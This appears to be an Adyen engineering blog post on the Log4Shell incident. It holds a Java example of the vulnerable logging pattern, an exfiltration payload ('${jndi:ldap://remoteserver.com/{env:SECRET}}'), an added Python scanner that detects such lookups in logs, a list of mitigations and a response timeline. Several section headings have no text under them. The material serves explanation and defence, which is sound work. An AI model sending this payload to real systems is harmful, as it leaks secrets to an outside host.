Published in Adyen Tech

Inside Adyen: The Log4j Saga

By Beppe Catanese, Developer Advocate, Adyen

Adyen Team — Photo by author

Log4Shell in simple words

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class MyWrapper {
    private static final Logger logger = LogManager.getLogger(MyWrapper.class);

    // Vulnerable (Log4j 2.0-beta9 to 2.14.1): attacker-controlled text reaches Log4j, which resolves ${...} lookups in it
    public void doSomething(String userInput) {
        logger.info(userInput);
    }

    public static void main(String[] args) {
        new MyWrapper().doSomething("${jndi:ldap://remoteserver.com/{env:SECRET}}");
    }
}

What about Adyen

Detection

Impact

Safekeeping factors

  • Outbound connections (egress traffic) are strictly regulated and allowed only when absolutely necessary, at both system and application level.
  • Systems are kept up-to-date with JDK releases and library patches.
  • Good application design and maintenance enables us to patch Log4j versions rapidly without introducing incompatibilities or breaking changes.
  • JNDI usage on the platform is strongly limited by design.
  • Thread context is set exclusively from local application information, so under no circumstances can it be controlled by user input or crafted requests.
  • Adopting a “Zero-Trust” network with strong firewall rules to limit the impact of a breach.
  • “Principle of Least Privilege” where applications and containers never run with any kind of elevated access scope.
  • Thorough logging and observability mindset where all networking, system, databases, security and user activities are available to perform in-depth threat hunting activities.
  • Sharp monitoring, built on extensive logging and enriched with external sources, so that new data points are constantly added to detect and alert on evolving threats and to respond rapidly even in a high-stress situation.
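The "sharp monitoring" bullet above and the snippet in the first section meet in the log pipeline: a defender wants to know which logged values contain Log4j lookup expressions, what they would resolve to, and whether the destination would have passed the egress policy. The following Python scanner is an added example, not code from the article or from Adyen. It parses the `${prefix:value}` lookup syntax (including nested braces, as in the article's payload), classifies each expression, and compares JNDI targets against an assumed egress allow-list. The log lines, the field layout, the hostname `ldap.internal.example` and the `ALLOWED_EGRESS_HOSTS` set are constructed placeholders.

```python
"""Detect Log4j lookup expressions (the ${jndi:...} shape shown above) in
sample log lines and report what each would do if resolved."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample log lines (not taken from the article). Line 2 carries the
# payload shape from the article's snippet; line 3 a non-JNDI lookup.
SAMPLE_LOG = """\
2021-12-10T08:05:12Z INFO checkout user-agent="Mozilla/5.0" path=/v1/payments
2021-12-10T08:05:13Z INFO checkout user-agent="${jndi:ldap://remoteserver.com/{env:SECRET}}" path=/v1/payments
2021-12-10T08:05:14Z INFO checkout note="price ${sys:java.version}" path=/v1/sessions
2021-12-10T08:05:15Z INFO checkout user-agent="curl/7.79" path=/v1/sessions
"""

# Assumed egress allow-list (placeholder hostname, not an Adyen value).
ALLOWED_EGRESS_HOSTS = {"ldap.internal.example"}

PREFIX_RE = re.compile(r"^\$\{([A-Za-z]+):")
JNDI_RE = re.compile(r"^\$\{jndi:([A-Za-z]+)://([^/:}]+)", re.IGNORECASE)
INNER_RE = re.compile(r"\$?\{([A-Za-z]+):([^{}$]*)\}")


@dataclass
class Finding:
    line_no: int
    expression: str                      # outermost ${...} as it appeared in the log
    prefix: str                          # lookup type: jndi, env, sys, ...
    scheme: Optional[str] = None         # ldap, rmi, dns ... for jndi lookups
    host: Optional[str] = None           # where the lookup would connect
    nested: List[str] = field(default_factory=list)  # e.g. ["env:SECRET"]
    egress_allowed: Optional[bool] = None
    severity: str = "medium"


def outer_lookups(text: str) -> List[str]:
    """Return every outermost ${...} expression in text, honouring nested braces."""
    spans, stack = [], []
    for i, ch in enumerate(text):
        if ch == "{":
            # remember where the brace (or its leading '$') started
            stack.append(i - 1 if i > 0 and text[i - 1] == "$" else i)
        elif ch == "}" and stack:
            start = stack.pop()
            if text.startswith("${", start):
                spans.append((start, i + 1))
    outer = [s for s in spans
             if not any(o[0] < s[0] and s[1] <= o[1] for o in spans)]
    return [text[a:b] for a, b in sorted(outer)]


def analyze(expression: str, line_no: int) -> Optional[Finding]:
    """Classify one lookup expression; None if it is not a prefixed lookup."""
    m = PREFIX_RE.match(expression)
    if not m:
        return None
    finding = Finding(line_no=line_no, expression=expression, prefix=m.group(1).lower())
    # Inner lookups resolve first, so their values end up in the outbound request.
    body = expression[2:-1]
    finding.nested = [f"{p.lower()}:{v}" for p, v in INNER_RE.findall(body)]
    if finding.prefix == "jndi":
        j = JNDI_RE.match(expression)
        if j:
            finding.scheme, finding.host = j.group(1).lower(), j.group(2)
            finding.egress_allowed = finding.host in ALLOWED_EGRESS_HOSTS
        finding.severity = "high"  # remote lookup: data exfiltration or class loading
    return finding


def scan_log(log_text: str) -> List[Finding]:
    """Scan each line for lookup expressions and return the findings in order."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        for expr in outer_lookups(line):
            f = analyze(expr, line_no)
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.severity.upper()} {f.prefix} lookup "
              f"-> host={f.host} nested={f.nested} egress_allowed={f.egress_allowed}")
```

On the sample input the scanner reports the JNDI lookup on line 2 as high severity with the nested `env:SECRET` lookup and an egress destination outside the allow-list, and the `sys` lookup on line 3 as medium. The egress comparison is the point of pairing detection with the first bullet: a finding whose host is not on the allow-list would have been blocked at the network boundary, which is exactly the outcome the article attributes to its egress controls.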

Patching and validation

Merchants first

A busy day at Adyen

  • 08:05 Adyen engineers became aware of the vulnerability.
  • 09:15 Apache Log4j vulnerability published by NIST.
  • 10:00 Initial security assessment completed: no impact thanks to mitigating factors in place.
  • 11:50 Concluded review of the entire Adyen platform: no instances could be exploited.
  • 14:05 Developing and testing new releases complete.
  • 17:00 Platform-wide patching and testing (Apache Log4j upgrade).
  • 17:45 Security analysis conclusion to confirm health of platform.

Adyen Picture (high-five between team members) — Photo by author

Tips for developers

Final words
